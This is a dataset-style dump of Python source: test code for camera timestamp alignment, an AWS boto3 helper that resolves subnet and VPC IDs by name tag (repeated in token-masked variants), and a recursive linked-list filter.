np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 
40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n <function token>\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import 
vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<code token>\n" ]
false
65
767c0e6d956701fcedddb153b6c47f404dec535a
import boto3

class NetworkLookup:

    def __init__(self):
        self.loaded = 0
        self.subnets = {}
        self.vpcs = {}

    def load(self):
        if self.loaded:
            return

        client = boto3.client('ec2')
        # load subnets
        subnets_r = client.describe_subnets()
        subnets_list = subnets_r['Subnets']
        while 'NextToken' in subnets_r:
            subnets_r = client.describe_subnets(NextToken=subnets_r['NextToken'])
            subnets_list.extend(subnets_r['Subnets'])

        for subnet in subnets_list:
            name = None
            if 'Tags' in subnet:
                for tag in subnet['Tags']:
                    if tag['Key'] == 'Name':
                        name = tag['Value']
            if name is not None:
                self.subnets[name] = subnet['SubnetId']

        # load vpcs
        vpcs_r = client.describe_vpcs()
        vpcs_list = vpcs_r['Vpcs']
        while 'NextToken' in vpcs_r:
            vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
            vpcs_list.extend(vpcs_r['Vpcs'])
        for vpc in vpcs_list:
            name = None
            if 'Tags' in vpc:
                for tag in vpc['Tags']:
                    if tag['Key'] == 'Name':
                        name = tag['Value']
            if name is not None:
                self.vpcs[name] = vpc['VpcId']

        # remember that the lookups are cached so later calls skip the API
        self.loaded = 1

    def get_subnets(self, environment_name, subnetname):
        self.load()
        return list(map(lambda x: self.subnets[x],
            filter(lambda x: x.startswith(f"{environment_name}{subnetname}"), self.subnets)
        ))

nl = NetworkLookup()

def replace_subnets(value, parameters):
    if isinstance(value, str) and value.startswith('CfHl.Subnet'):
        parts = value.split('.')
        if len(parts) == 3:
            subnet_class = parts[2]
            environment_name = parameters['EnvironmentName']
            subnets = nl.get_subnets(environment_name, subnet_class)
            if parts[1] == 'Subnets':
                return subnets
            elif parts[1] == 'Subnet':
                if subnets:
                    return subnets[0]
    return value

def replace_vpc(value, parameters):
    if isinstance(value, str) and value.startswith('CfHl.Vpc'):
        nl.load()
        parts = value.split('.')
        environment_name = parameters['EnvironmentName']
        if len(parts) == 3:
            prop = parts[2]
            if prop == 'Id':
                vpcs = nl.vpcs
                if f"{environment_name}-vpc" in vpcs:
                    return vpcs[f"{environment_name}-vpc"]
    return value

def replace_network(value, parameters):
    value = replace_subnets(value, parameters)
    value = replace_vpc(value, parameters)
    return value

if __name__ == '__main__':
    print(replace_network('CfHl.Subnets.Public',{'EnvironmentName':'dev'}))
    print(replace_network('CfHl.Subnet.Public0',{'EnvironmentName':'dev'}))
    print(replace_network('CfHl.Vpc.Id',{'EnvironmentName':'dev'}))
[ "import boto3\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n\n client = boto3.client('ec2')\n # load subnets\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n\n # load vpcs\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map( lambda x: self.subnets[x] ,\n filter(lambda x: x.startswith(f\"{environment_name}{subnetname}\"), self.subnets)\n ))\n\nnl = NetworkLookup()\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f\"{environment_name}-vpc\" in vpcs:\n return vpcs[f\"{environment_name}-vpc\"]\n return value\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\nif __name__ == '__main__':\n print(replace_network('CfHl.Subnets.Public',{'EnvironmentName':'dev'}))\n print(replace_network('CfHl.Subnet.Public0',{'EnvironmentName':'dev'}))\n print(replace_network('CfHl.Vpc.Id',{'EnvironmentName':'dev'}))\n", "import boto3\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return 
list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\nnl = NetworkLookup()\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\n\nif __name__ == '__main__':\n print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\nnl = NetworkLookup()\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\n\nif __name__ == '__main__':\n 
print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\n\nif __name__ == '__main__':\n print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))\n print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in 
vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\ndef replace_network(value, parameters):\n value = replace_subnets(value, parameters)\n value = replace_vpc(value, parameters)\n return value\n\n\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n\n\ndef replace_subnets(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Subnet'):\n parts = value.split('.')\n if len(parts) == 3:\n subnet_class = parts[2]\n environment_name = parameters['EnvironmentName']\n subnets = nl.get_subnets(environment_name, subnet_class)\n if parts[1] == 'Subnets':\n return subnets\n elif parts[1] == 'Subnet':\n if subnets:\n return subnets[0]\n return value\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = 
boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n<function token>\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = 
client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n <function token>\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n <function token>\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n <function token>\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<class token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
66
efcbe296ea72a94be967124a8ba8c84a524e2eb1
__author__ = 'AChen'

from rec_linked_list import LinkedListRec


def filter_pos_rec(lst):
    """Return a new linked list containing only the items of <lst>
    that are strictly positive.

    @type lst: LinkedListRec
    @rtype: LinkedListRec

    >>> lst = LinkedListRec([3, -10, 4, 0])
    >>> pos = filter_pos_rec(lst)
    >>> str(pos)
    '3 -> 4'
    """
    if lst.is_empty():
        return lst
    else:
        pos_rec = LinkedListRec([])
        if lst._first > 0:
            # keep this item and recursively filter the rest
            pos_rec._first = lst._first
            pos_rec._rest = filter_pos_rec(lst._rest)
        else:
            # drop this item; the result is just the filtered rest
            pos_rec = filter_pos_rec(lst._rest)
        return pos_rec
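filter_pos_rec depends on a rec_linked_list module that is not included here. The class below is an assumed minimal reconstruction, inferred only from what the function touches (_first, _rest, is_empty, a list constructor, and ' -> ' rendering); the real course-provided class may well differ.

class LinkedListRec:
    """Assumed minimal recursive linked list; a sketch, not the real module."""

    def __init__(self, items):
        if not items:
            self._first = None  # empty-list sentinel
            self._rest = None
        else:
            self._first = items[0]
            self._rest = LinkedListRec(items[1:])

    def is_empty(self):
        return self._first is None

    def __str__(self):
        if self.is_empty():
            return ''
        if self._rest.is_empty():
            return str(self._first)
        return f'{self._first} -> {self._rest}'

Saved as rec_linked_list.py next to this file, this is enough for python -m doctest to pass the '3 -> 4' example above.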
